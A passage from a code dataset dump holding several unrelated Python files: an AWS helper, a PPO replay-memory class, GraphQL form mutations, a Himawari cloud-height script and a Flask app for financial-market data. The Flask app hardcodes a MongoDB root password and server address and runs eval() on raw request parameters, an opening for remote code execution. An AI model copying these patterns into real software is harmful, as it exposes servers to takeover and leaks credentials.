sts_client.assume_role(\n RoleArn=role_arn, RoleSessionName=\"AssumeRoleSession1\"\n )\n credentials = assumed_role_object[\"Credentials\"]\n return boto3.client(\n resource,\n aws_access_key_id=credentials[\"AccessKeyId\"],\n aws_secret_access_key=credentials[\"SecretAccessKey\"],\n aws_session_token=credentials[\"SessionToken\"],\n )\n\n\ndef get_elastic_ip():\n \"\"\"\n Our VPCs have exactly one elastic IP associated with them.\n\n Because our services run in private subnets and use a NAT Gateway to connect\n to the public Internet through an elastic IP, this is the address from which\n all our service traffic will originate.\n\n Returns the IPv4 address of our elastic IP.\n \"\"\"\n ec2_client = get_aws_client(\"ec2\")\n resp = ec2_client.describe_addresses()\n\n ipv4_addresses = [addr[\"PublicIp\"] for addr in resp[\"Addresses\"]]\n\n if len(ipv4_addresses) == 0:\n raise RuntimeError(\"No Elastic IPs found!\")\n elif len(ipv4_addresses) > 1:\n address_string = \", \".join(ipv4_addresses)\n raise RuntimeError(f\"More than one Elastic IP found: {address_string}\")\n else:\n return ipv4_addresses[0]\n\n\ndef store_secret(*, secret_id, secret_string):\n \"\"\"\n Store a SecretString in Secrets Manager.\n \"\"\"\n secrets_client = get_aws_client(\"secretsmanager\", role_arn=DEV_ROLE_ARN)\n write_secret(secrets_client, id=secret_id, value=secret_string)\n","sub_path":"scripts/_aws.py","file_name":"_aws.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"366702422","text":"import tensorflow as tf\nimport numpy as np\nimport random\ndef variable_summaries(var, scope):\n\twith tf.name_scope(scope):\n\t\tmean = tf.reduce_mean(var)\n\t\ttf.summary.scalar('mean', mean)\n\t\t#with tf.name_scope('stddev'):\n\t\t#\tstddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n\t\t#tf.summary.scalar('stddev', stddev)\n\t\t#tf.summary.scalar('max', tf.reduce_max(var))\n\t\t#tf.summary.scalar('min', tf.reduce_min(var))\n\t\ttf.summary.histogram('histogram', var)\n\n\ndef weight_variable(input_dim, output_dim, trainable, scale=0.1):\n\treturn tf.get_variable(\n\t\tname='weights',\n\t\tshape=[input_dim, output_dim],\n\t\tinitializer=tf.truncated_normal_initializer(stddev=0.1),\n\t\ttrainable=trainable)\n\ndef bias_variable(output_dim, trainable):\n\treturn tf.get_variable(\n\t\tname='bias',\n\t\tshape=[1,output_dim],\n\t\tinitializer=tf.constant_initializer(0.1),\n\t\ttrainable=trainable)\n\n\nclass Memory(object):\n\tdef __init__(self):\n\t\tself.actions = None\n\t\tself.observation = None\n\t\tself.adv = None\n\t\tself.v = None\n\t\tself.target_v = None\n\t\tself.size = 0\n\tdef save(self, s, a, advs, target_v, v):\n\t\tif (self.size == 0):\n\t\t\tself.observation = s.copy()\n\t\t\tself.actions = a.copy()\n\t\t\tself.adv = advs.copy()\n\t\t\tself.target_v = target_v.copy()\n\t\t\tself.v = v.copy()\n\t\t\tself.size = self.observation.shape[0]\n\t\telse:\t\n\t\t\tself.observation = np.concatenate([self.observation, s.copy()], axis=0)\n\t\t\tself.actions = np.concatenate([self.actions, a.copy()], axis=0)\n\t\t\tself.adv = np.concatenate([self.adv, advs.copy()], axis=0)\n\t\t\tself.target_v = np.concatenate([self.target_v, target_v.copy()], axis=0)\n\t\t\tself.v = np.concatenate([self.v, v.copy()], axis=0)\n\t\t\tself.size = self.observation.shape[0]\n\n\tdef sample(self, *, batch_size):\n\t\tassert self.size >= batch_size, 'Not enough transitions'\n\t\tindices = random.sample(range(self.size), batch_size)\n\t\tbs = self.observation[indices, :].copy()\n\t\tba = self.actions[indices, :].copy()\n\t\tbadv = self.adv[indices, :].copy()\n\t\tbtarv = self.target_v[indices, :].copy()\n\t\tboldv = self.v[indices, :].copy()\n\t\treturn bs, ba, badv, btarv, boldv\n\n\tdef sample_all(self):\n\t\treturn self.observation.copy(), self.actions.copy(), self.adv.copy(), self.target_v.copy(), self.v.copy()\n\n\tdef reset(self):\n\t\tself.actions = None\n\t\tself.observation = None\n\t\tself.adv = None\n\t\tself.target_v = None\n\t\tself.v = None\n\t\tself.size = 0\n\n\tdef get_size(self):\n\t\tif isinstance(self.observation, np.ndarray):\n\t\t\tassert self.size == self.observation.shape[0], 'replay inside error'\n\t\telse:\n\t\t\tassert self.size == 0\n\t\treturn self.size","sub_path":"ppo0.2/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550548059","text":"from models.form import FormTemplate\nfrom models.field import EmbeddedField\nfrom .utils import DBInterface\nfrom .field import EmbeddedFieldType, EmbeddedFieldInput, AddField, EditField, RemoveField\nfrom graphene import (ObjectType, Mutation, InputObjectType,\n String, Boolean, ID, List, Field, InputField)\n\n\nclass CommonAttributes(object):\n name = String()\n title = String()\n description = String()\n collections = List(ID)\n\n\n######################################################################\n\n\nclass FormInterface(CommonAttributes, DBInterface):\n fields = List(EmbeddedFieldType)\n field = Field(EmbeddedFieldType, _id=ID(required=True))\n default_collection = ID()\n links = List(ID)\n\n @staticmethod\n def resolve_field(root, info, _id):\n return root.find_field_by_id(_id)\n\n\nclass FormType(ObjectType):\n class Meta:\n name = \"Form\"\n description = \"...\"\n interfaces = (FormInterface,)\n\n\n######################################################################\n\n\nclass FormInput(CommonAttributes, InputObjectType):\n fields = InputField(List(EmbeddedFieldInput))\n\n\nclass CreateForm(InputObjectType):\n form_data = InputField(FormInput, required=True)\n\n\nclass UpdateForm(InputObjectType):\n form_id = ID(required=True)\n form_data = InputField(FormInput, required=True)\n\n\nclass DeleteForm(InputObjectType):\n form_id = ID(required=True)\n\n\nclass FormOps(Mutation):\n class Meta:\n name = \"FormOps\"\n description = \"...\"\n\n class Arguments:\n create = CreateForm()\n update = UpdateForm()\n delete = DeleteForm()\n\n add_field = AddField()\n edit_field = EditField()\n remove_field = RemoveField()\n\n ops = List(String)\n ok = Boolean()\n form = Field(lambda: FormType)\n\n @staticmethod\n def mutate(root, info, create=None, update=None, delete=None,\n add_field=None, edit_field=None, remove_field=None, **kwargs):\n ops = []\n ok = False\n form = None\n\n if create:\n ops.append(\"create\")\n\n form = FormTemplate(**create.form_data)\n\n try:\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if update:\n ops.append(\"update\")\n\n form = FormTemplate.find_by_id(update.form_id)\n\n try:\n for atr, val in update.form_data.items():\n if hasattr(form, atr) and atr != \"fields\":\n setattr(form, atr, val)\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if add_field:\n ops.append(\"add_field\")\n\n form = FormTemplate.find_by_id(add_field.form_id)\n field = EmbeddedField(**add_field.field_data)\n\n try:\n form.fields.insert(field.index, field)\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if edit_field:\n ops.append(\"edit_field\")\n\n form = FormTemplate.find_by_id(edit_field.form_id)\n\n try:\n field = form.find_field_by_id(edit_field.field_id)\n index = edit_field.field_data.get(\"index\", field.index)\n if index != field.index:\n form.fields.remove(field)\n form.fields.insert(index, field)\n\n for atr, val in edit_field.field_data.items():\n if hasattr(field, atr):\n setattr(field, atr, val)\n\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if remove_field:\n ops.append(\"remove_field\")\n\n form = FormTemplate.find_by_id(remove_field.form_id)\n\n try:\n field = form.find_field_by_id(remove_field.field_id)\n form.fields.remove(field)\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if delete:\n ops.append(\"delete\")\n\n form = FormTemplate.find_by_id(delete.form_id)\n\n try:\n form.delete()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n return FormOps(ok=ok, ops=ops)\n\n return FormOps(ok=ok, form=form, ops=ops)\n\n","sub_path":"app/api/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"429614546","text":"\n# coding: utf-8\n\n# In[12]:\n\n\nimport numpy as np\nimport scipy.io as scio\nimport h5py\nfrom sklearn.externals import joblib\nimport warnings\n# from scipy import interpolate\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n# from mpl_toolkits.basemap import interp\n# from mpl_toolkits.basemap import maskoceans\n\nnp.set_printoptions(suppress= True)\nwarnings.filterwarnings('ignore')\n\n\n# In[13]:\n\n\n# load models\nxgb_clf = joblib.load('model/xgb_clf_0.9083.m')\nxgb_r = joblib.load('model/xgb_r_1386.7171.m')\n# path\nfilename = r'D:\\Himawari\\AHI8_OBI_4000M_NOM_20190223_0020.hdf'\npath_out = r'D:\\Himawari\\out'\nfilename_out = 'AHI8_TOP_' + filename.split('_')[4] + '_' + filename.split('_')[5].split('.')[0]\n\n\n# In[14]:\n\n\ndef get_LonLat(l,c):\n coff = 1375.5\n loff = 1375.5\n cfac = 10233128\n lfac = 10233128\n ea = 6378.137\n eb = 6356.7523\n h = 42164\n lamda_Himawari_8 = 140.7\n x = (np.pi * (c - coff))/(180 * np.exp2(-16) * cfac)\n y = (np.pi * (l - coff))/(180 * np.exp2(-16) * lfac)\n sd = np.sqrt((h * np.cos(x) * np.cos(y))**2 - (np.cos(y)**2 + ea**2/eb**2 * np.sin(y)**2) * ((h**2) - ea**2))\n sn = (h * np.cos(x) * np.cos(y) - sd)/(np.cos(y)**2 + ea**2/eb**2 * np.sin(y)**2)\n s1 = h - sn * np.cos(x) * np.cos(y)\n s2 = sn * np.sin(x) * np.cos(y)\n s3 = -sn * np.sin(y)\n sxy = np.sqrt(s1**2 + s2**2)\n lon = (180/np.pi)*np.arctan(s2/s1) + lamda_Himawari_8\n lat = (180/np.pi)*np.arctan((ea**2/eb**2) * (s3/sxy))\n return lon,lat\n\n\n# In[15]:\n\n\n# readfile\ndata_hdf = h5py.File(filename,'r')\n\n# assign 16 features\nup = 110\ndown = 1120\nleft = 0\nright = 1370\nfeatures = np.ones((down - up,right - left,16),dtype = 'float32')\nfeatures[:,:,0] = data_hdf['NOMChannelVIS0064_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,1] = data_hdf['NOMChannelVIS0086_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,2] = data_hdf['NOMChannelVIS0160_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,3] = data_hdf['NOMChannelVIS0230_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,4] = data_hdf['NOMChannelIRX0390_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,5] = data_hdf['NOMChannelIRX0620_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,6] = data_hdf['NOMChannelIRX0700_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,7] = data_hdf['NOMChannelIRX0730_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,8] = data_hdf['NOMChannelIRX0860_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,9] = data_hdf['NOMChannelIRX0960_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,10] = data_hdf['NOMChannelIRX1040_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,11] = data_hdf['NOMChannelIRX1120_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,12] = data_hdf['NOMChannelIRX1230_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,13] = data_hdf['NOMChannelIRX1330_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,14] = data_hdf['NOMSatelliteZenith'][up:down,left:right].astype('float16')/100\nfeatures[:,:,15] = data_hdf['NOMSunZenith'][up:down,left:right].astype('float16')/100\nfeatures[:,:,0] = features[:,:,0]/np.cos(np.deg2rad(features[:,:,15]))\n\n# close & clear\n# data_hdf.close()\n# del data_hdf\n\n\n# In[16]:\n\n\n# do some mask\nmask = np.ones(features.shape,dtype= 'bool')\nmask = np.where(features[:,:,0]< 0.01,True,False)\nfor i in range(16):\n features[:,:,i] = np.ma.masked_array(features[:,:,i],mask)\n\n\n# In[17]:\n\n\n# classify\nfeatures_reshaped = features.reshape(-1,16)\ncloud_clfed = xgb_clf.predict(features_reshaped)\nindex = np.where(cloud_clfed == 1)\n\n\n# In[18]:\n\n\n# regress\ncloud_clfed[index] = xgb_r.predict(features_reshaped[index])\n\n\n# In[19]:\n\n\n# reshape\ncloud_clfed = cloud_clfed.reshape(features.shape[0:2])\ncloud_clfed = np.where(cloud_clfed < 0, 0, cloud_clfed)\n# cloud_clfed = np.ma.masked_array(cloud_clfed,mask)\n\n\n# In[20]:\n\n\n# lon,lat,mask 掉反射率小于1%的\nlat, lon = np.meshgrid(range(left,right),range(up,down))\nlat = np.ma.array(lat,mask= mask)\nlon = np.ma.array(lon,mask= mask)\n# index_lonlat = np.where(mask == False)\nlons, lats = get_LonLat(lon,lat)\nlons[lons > 180] -= 360\n\n\n# 等经纬度插值(失败)\n# lat = np.arange(10,60.01,0.04)\n# lon = np.arange(70,140.01,0.04)\n\n# lons_out, lats_out = np.meshgrid(lon,lat)\n# interpFun = interpolate.interp2d(lats[500:600,500:600],lons[500:600,500:600],cloud_clfed[500:600,500:600],kind= 'cubic')\n# cloud_clfed = interp(cloud_clfed,lons,lats,lons_out,lats_out)\n\n\n# In[21]:\n\n\n# 画图\nfig = plt.figure(1,figsize=(8,8),dpi = 100)\n\nax = fig.add_subplot(111)\nm_1 = Basemap( llcrnrlon = 70, llcrnrlat = 10, urcrnrlon = 140, urcrnrlat = 60, \n projection = 'cyl')\n# m_1 = Basemap( projection = 'ortho', lat_0 = 0, lon_0 = 140 )\nm_1.drawcoastlines(linewidth= 0.5)\nm_1.drawmeridians(np.arange(70.,141.,10.),labels=[0, 0, 0, 1],fontsize=10)\nm_1.drawparallels(np.arange(10.,61.,10.),labels=[1, 0, 0, 0],fontsize=10)\n\nX,Y = m_1(lons,lats)\ncloud_clfed = np.ma.masked_array(cloud_clfed, mask = X.mask)\ncs = m_1.contourf(X,Y,cloud_clfed)\n\ncbar = m_1.colorbar(cs,'bottom',pad = '5%')\ncbar.set_label('H of cloud /m')\n# plt.colorbar(ax = ax)\n# m_1.imshow(cloud_clfed[::-1])\nfig.savefig(path_out + '\\\\' + filename_out + '.jpg')\nplt.show()\n\n\n# In[25]:\n\n\nf_cloud = h5py.File(path_out + '\\\\' + filename_out + '.hdf','w')\nf_cloud['cloud_clfed'] = cloud_clfed\nf_cloud['lons'] = lons\nf_cloud['lats'] = lats\nf_cloud.close() \n\n","sub_path":"XGBboost_cloud.py","file_name":"XGBboost_cloud.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"546401857","text":"#coding: utf-8\nfrom flask import Flask,render_template,redirect,url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask import request\nimport pandas as pd\nimport numpy as np\nfrom numpy import NAN\nfrom pandas import DataFrame\n\nfrom pymongo import MongoClient\nimport time,datetime,json\nfrom flask import Flask, jsonify\nfrom flask_httpauth import HTTPBasicAuth\nauth = HTTPBasicAuth()\n\nclient=MongoClient('mongodb://root:' + '5768116' + '@139.196.79.93')\ndb = client.huiyuan\ncollection = db.huiyuan \ncursor = collection.find()\nhuiyuan_df = pd.DataFrame(list(cursor))\n\ndb = client.jishi \ncollection = db.jishi \n\ndb2 = client.huiguang \ncollection2 = db2.huiguang \n\ndb3 = client.huiguangzhu \ncollection3 = db3.huiguangzhu \n\ndb4 = client.tongxun \ncollection4 = db4.tongxun\n\ndb5 = client.piaofen\ncollection5 = db5.piaofen\n\ndb6 = client.piaofenxi\ncollection6 = db6.piaofenxi\n\ndb7 = client.huiyuan\ncollection7 = db7.huiyuan \ncursor = collection7.find()\nhuiyuan_df= pd.DataFrame(list(cursor))\n\ndb9 = client.zixun\ncollection9 = db9.zixun\n\ndb10=client.tongxun\ncollection10 = db10.tongxun\n\ndb11=client.cundan\ncollection11 = db11.cundan\n#\ndb12=client.xianxia\ncollection12 = db12.xianxia\n\ndb13=client.number\ncollection13 = db13.number\n\n\napp=Flask(__name__)\nbootstrap=Bootstrap(app)\nb=2\njigou=''\ntt=''\nname=''\n@auth.get_password\ndef get_password(username):\n global tt\n for i in range (0,len(huiyuan_df)):\n if( username==str(huiyuan_df.loc[i,'username'])): \n tt=username\n return(huiyuan_df.loc[i,'password'])\n return None\n\n@auth.error_handler\ndef unauthorized():\n return render_template('regist.html')\n\n\n\n\n\n\n\n@app.route('/', methods=['GET'])\ndef get_tasks(task_id):\n if task_id==11: #票交所利率数据下载\n db8 = client.piaojiaosuo\n collection8 = db8.piaojiaosuo \n cursor8 = collection8.find()\n piaofen_df = pd.DataFrame(list(cursor8))\n if piaofen_df.empty:\n return('999')\n else:\n del piaofen_df['_id']\n\n piaofen_df=piaofen_df.to_json()\n return(piaofen_df)\n\n\n\n\n elif task_id==41: #同业通宝数据录入\n maiyin = request.args.get('maiyin')\n shijian = request.args.get('shijian')\n biao=maiyin.replace('dict_values(','')\n biao=biao.replace(')','')\n biao = eval(biao)\n biao_df=pd.DataFrame(biao)\n biao_df['报价日']=shijian\n\n biao_df= json.loads(biao_df.T.to_json()).values() \n \n db12 = client.xianxia\n collection12 = db12.xianxia\n cursor12 = collection12.find({\"$and\":[{'报价日':str(shijian)}]})\n xianxia_df = pd.DataFrame(list(cursor12))\n if xianxia_df.empty:\n collection12.insert(biao_df)\n return('already updated')\n\n \n\n\n\n \n elif task_id==31: #票交所发行量下载\n shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n shijian2 = datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n\n shijian3=shijian2-datetime.timedelta(days=1)\n shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n shijian4=shijian2-datetime.timedelta(days=29)\n shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n\n \n db9 = client.piaojiaosuo2\n collection9 = db9.piaojiaosuo2 \n cursor9 = collection9.find({'提取日期':{'$gte':shijian4}})\n piaofen_df = pd.DataFrame(list(cursor9))\n if piaofen_df.empty:\n return('999')\n else:\n del piaofen_df['_id']\n piaofen_df=piaofen_df.to_json()\n return(piaofen_df)\n\n elif task_id==21: #票交所利率数据录入\n maiyin = request.args.get('maiyin')\n maiyin=maiyin.replace('dict_values([','')\n maiyin=maiyin.replace('])','')\n maiyin = eval(maiyin)\n maiyin_df=pd.DataFrame(maiyin, index=[0])\n maiyin1= json.loads(maiyin_df.T.to_json()).values()\n\n \n maishang = request.args.get('maishang')\n maishang=maishang.replace('dict_values([','')\n maishang=maishang.replace('])','')\n maishang = eval(maishang)\n maishang_df=pd.DataFrame(maishang, index=[0])\n maishang1= json.loads(maishang_df.T.to_json()).values()\n \n huiyin = request.args.get('huiyin')\n huiyin=huiyin.replace('dict_values([','')\n huiyin=huiyin.replace('])','')\n huiyin = eval(huiyin)\n huiyin_df=pd.DataFrame(huiyin, index=[0])\n huiyin1= json.loads(huiyin_df.T.to_json()).values()\n\n huishang = request.args.get('huishang')\n huishang=huishang.replace('dict_values([','')\n huishang=huishang.replace('])','')\n huishang = eval(huishang)\n huishang_df=pd.DataFrame(huishang, index=[0])\n huishang1= json.loads(huishang_df.T.to_json()).values() \n shijian = request.args.get('shijian')\n \n db8 = client.piaojiaosuo\n collection8 = db8.piaojiaosuo\n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'买断式'},{'票据类型':'电银'}]})\n maiyin_df = pd.DataFrame(list(cursor8))\n if maiyin_df.empty:\n collection8.insert(maiyin1)\n\n \n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'买断式'},{'票据类型':'电商'}]})\n maishang_df = pd.DataFrame(list(cursor8))\n if maishang_df.empty:\n collection8.insert(maishang1)\n\n\n\n\n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'回购式'},{'票据类型':'电银'}]})\n huiyin_df = pd.DataFrame(list(cursor8))\n if huiyin_df.empty:\n collection8.insert(huiyin1)\n\n\n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'回购式'},{'票据类型':'电商'}]})\n huishang_df = pd.DataFrame(list(cursor8))\n if huishang_df.empty:\n collection8.insert(huishang1)\n\n return('already updated')\n\n\n\n\n@app.route('/fasong',methods=['POST','GET'])\n@auth.login_required\ndef fasong():\n global tt,jigou,name\n shijian11=time.strftime('%y-%m-%d',time.localtime(time.time()))\n shijian11 = datetime.datetime.strptime(shijian11, \"%y-%m-%d\")\n shijian11=shijian11.strftime(\"%Y-%m-%d\") #今天\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) \n chu=0\n chucun=0\n chudai=0\n chufu=0\n chuhui=0\n chuli=0\n shou=0\n shoucun=0\n shoudai=0\n shouli=0\n shoufu=0\n shouhui=0\n if request.method == 'POST':\n\n if request.form['Submit']=='发送':\n value2= request.form.getlist('demo-checkbox')\n value3= request.form.get('demo-checkbox')\n for index, value in enumerate(value2):\n if value=='1':\n value2[index]='收票'\n shou=1\n if value=='2':\n value2[index]='出票'\n chu=1\n if value=='3':\n value2[index]='收代持'\n shoudai=1\n if value=='4':\n value2[index]='出代持'\n chudai=1\n if value=='5':\n value2[index]='收回购'\n shouhui=1\n if value=='6':\n value2[index]='出回购'\n chuhui=1\n if value=='7':\n value2[index]='收证'\n shoufu=1\n if value=='8':\n value2[index]='出证'\n chufu=1\n if value=='9':\n value2[index]='收理财'\n shouli=1\n if value=='10':\n value2[index]='出理财'\n chuli=1\n if value=='11':\n value2[index]='收存单'\n shoucun=1\n if value=='12':\n value2[index]='出存单'\n chucun=1\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n\n#\n for i in range(0,len(huiyuan_df)):\n if str(huiyuan_df.loc[i,'username'])==tt:\n jigou=huiyuan_df.loc[i,'jigou']\n name=huiyuan_df.loc[i,'name']\n break\n\n \n data=pd.DataFrame({'发送日期':[shijian11], #\n '发送时间':[shijian_t], #\n '机构':[jigou],\n '用户':[name],\n '业务':[value2],#\n 'shou':shou,\n 'chu':chu,\n 'shoudai':shoudai,\n 'chudai':chudai,\n 'shouhui':shouhui,\n 'chuhui':chuhui,\n 'shoufu':shoufu,\n 'chufu':chufu,\n 'shouli':shouli,\n 'chuli':chuli,\n 'shoucun':shoucun,\n 'chucun':chucun, \n '备注':[request.form['username']], \n '用户名':[tt]\n }) #\n \n records = json.loads(data.T.to_json()).values() #\n collection2.insert(records) #\n\n\n return render_template('fasong.html')\n\n\n#\n\n \n@app.route('/zixun',methods=['POST','GET'])\ndef zixun():\n global b\n #sousuo=''\n zixun1_shun=[]\n zixun_df=[]\n zixun_dfs=pd.DataFrame({'时间':[], #\n '爬取日期':[], #\n '标题':[],#\n '权重':[],\n '序号':[],\n '链接':[],\n '网站':[],\n '国外':[]\n }) #\n shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n shijian2 = datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n # shijian2=str(shijian2.strftime(\"%Y-%m-%d\"))\n\n shijian3=shijian2-datetime.timedelta(days=1)\n shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n shijian4=shijian2-datetime.timedelta(days=29)\n shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n\n \n cursor9= collection9.find({'网站':'交易云'})\n yuanc=pd.DataFrame(list(cursor9))\n yuanc=yuanc[['时间','标题','链接','网站','获取号']]\n yuanc['时间'] = pd.to_datetime(yuanc['时间']).astype('str') #,format='%Y%m%d' 吧yyyy-m-d 转化为yyyy-mm-dd的时间格式\n\n yuanc= yuanc.sort_values(by=['获取号','时间'], ascending=True)\n yuanc=yuanc.reset_index(drop = False)\n\n \n cursor9= collection9.find({'爬取日期':{'$gte':shijian3}})\n #cursor9 = collection9.find({ \"$and\":[{'爬取日期':{'$gte':shijian3}},{'国外':0}]})\n zixun_df = pd.DataFrame(list(cursor9))\n\n if zixun_df.empty:\n return render_template('zixun.html',zixun1_shun=json.dumps(zixun_shun),zixun=json.dumps(zixun_df),yuanc=yuanc,y=len(yuanc),b=b)\n\n zixun_df=zixun_df[['时间','爬取日期','标题','权重','序号','链接','网站','国外']]\n for i in range(0,len(zixun_df)):\n if zixun_df.loc[i,'序号']=='':\n zixun_df.loc[i,'序号']=zixun_df.loc[i,'网站']\n \n zixun_df=zixun_df[(zixun_df['国外']!=1)]\n zixun_df= zixun_df.sort_values(by=['爬取日期','时间'], ascending=False)\n zixun_df=zixun_df.reset_index(drop = True)\n zixun_df=zixun_df[['时间','爬取日期','标题','权重','序号','链接','网站']]\n\n # zixun_df1= zixun_df1[(len(zixun_df1)-min(20,len(zixun_df1))):len(zixun_df1)]\n\n print(zixun_df)\n zixun_shun=zixun_df['链接'].tolist()\n zixun_df=zixun_df.set_index('链接').T.to_dict('list')\n\n\n\n if request.method == 'POST':\n if request.form['Submit']=='搜索':\n cursor9 = collection9.find({ \"$and\":[{'爬取日���':{'$gte':shijian4}},{'标题':{'$regex':request.form['标题']}}]})\n zixun_dfs = pd.DataFrame(list(cursor9))\n if zixun_dfs.empty:\n zixun_df=[]\n\n else:\n zixun_dfs=zixun_dfs[['时间','爬取日期','标题','权重','序号','链接','网站']]\n\n\n \n for i in range(0,len(zixun_dfs)):\n if zixun_dfs.loc[i,'序号']=='':\n zixun_dfs.loc[i,'序号']=zixun_dfs.loc[i,'网站']\n \n zixun_dfs= zixun_dfs.sort_values(by=['爬取日期','时间'], ascending=False)\n zixun_dfs=zixun_dfs.reset_index(drop = True)\n zixun_shun=zixun_dfs['链接'].tolist()\n zixun_df=zixun_dfs.set_index('链接').T.to_dict('list')\n\n return render_template('zixun.html',zixun1_shun=json.dumps(zixun_shun),zixun=json.dumps(zixun_df),yuanc=yuanc,y=len(yuanc),b=b)\n\n\n\n \n@app.route('/yuanchuang',methods=['POST','GET'])\ndef yuanchuang():\n global b\n #sousuo=''\n yuanc_shun=[]\n yuanc=[]\n zixun_dfs=pd.DataFrame({'时间':[], #\n '爬取日期':[], #\n '标题':[],#\n '权重':[],\n '序号':[],\n '链接':[],\n '网站':[],\n '国外':[]\n }) #\n shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n shijian2 = datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n shijian3=shijian2-datetime.timedelta(days=1)\n shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n shijian4=shijian2-datetime.timedelta(days=29)\n shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n\n cursor9= collection9.find({'网站':'交易云'})\n yuanc=pd.DataFrame(list(cursor9))\n#\n\n if yuanc.empty:\n yuanc=[]\n\n yuanc=yuanc[['时间','标题','链接','网站','获取号']]\n yuanc['时间'] = pd.to_datetime(yuanc['时间']).astype('str') #,format='%Y%m%d' 吧yyyy-m-d 转化为yyyy-mm-dd的时间格式\n yuanc= yuanc.sort_values(by=['获取号','时间'], ascending=True)\n yuanc=yuanc.reset_index(drop = True)\n yuanc_shun=yuanc['链接'].tolist()\n\n yuanc=yuanc.set_index('链接').T.to_dict('list')\n\n if request.method == 'POST':\n if request.form['Submit']=='搜索':\n\n cursor9 = collection9.find({ \"$and\":[{'网站':'交易云'},{'标题':{'$regex':request.form['标题']}}]})\n yuanc = pd.DataFrame(list(cursor9))\n if yuanc.empty:\n yuanc=[]\n\n else:\n yuanc=yuanc[['时间','标题','链接','网站','获取号']]\n\n yuanc['时间'] = pd.to_datetime(yuanc['时间']).astype('str') #,format='%Y%m%d' 吧yyyy-m-d 转化为yyyy-mm-dd的时间格式\n yuanc= yuanc.sort_values(by=['获取号','时间'], ascending=True)\n yuanc=yuanc.reset_index(drop = True)\n yuanc_shun=yuanc['链接'].tolist()\n\n yuanc=yuanc.set_index('链接').T.to_dict('list')\n\n\n\n return render_template('yuanchuang.html',yuanc_shun=json.dumps(yuanc_shun),yuanc=json.dumps(yuanc))\n\n\n\n\n\n \n@app.route('/cundan',methods=['POST','GET'])\ndef cundan():\n cundan_df=''\n qixian=''\n if request.method == 'POST':\n if request.form['cundan']=='查询':\n yinhang=request.form['yin']\n qixian=request.form['good3']\n faxing=request.form['good']\n if yinhang =='':\n cundan_df='请输入要查找的银行存单'\n return render_template('cundan.html',cundan_df=cundan_df)\n\n if qixian=='不限':\n\n cursor11 = collection11.find({\"$or\":[{'银行分类':yinhang},{'发行人':{'$regex':yinhang}}]})\n \n else:\n cursor11 = collection11.find({ \"$and\":[{'期限':qixian},{\"$or\":[{'银行分类':yinhang},{'发行人':{'$regex':yinhang}}]}]})\n\n \n cundan_df=pd.DataFrame(list(cursor11))\n if cundan_df.empty:\n a='近期未发行存单。'\n return render_template('cundan.html',cundan_df=a)\n\n cundan_df=cundan_df[['发行人','发行日','期限','收益率','实际发行(亿)','计划发行(亿)','爬取日期']]\n\n cundan_df['计划发行(亿)']=cundan_df['计划发行(亿)'].astype('float') #要转化为string才能把NaN填充为空值\n cundan_df['实际发行(亿)']=cundan_df['实际发行(亿)'].astype('float') #要转化为string才能把NaN填充为空值\n cundan_df=cundan_df.where(cundan_df.notnull(), '') #把NAN换成空格\n # cundan_df.fillna(value='')\n # cundan_df.rdd.map({NaN:'','None':''})\n\n cundan_df=cundan_df.reset_index(drop = True)\n\n # for i in range(0,len(cundan_df)):\n # if (cundan_df.loc[i,'实际发行(亿)'] is None) or (cundan_df.loc[i,'实际发行(亿)'] is nan):\n # cundan_df.loc[i,'实际发行(亿)']='wu' \n\n # if (cundan_df.loc[i,'计划发行(亿)'] is None ) or (cundan_df.loc[i,'计划发行(亿)'] is nan):\n # 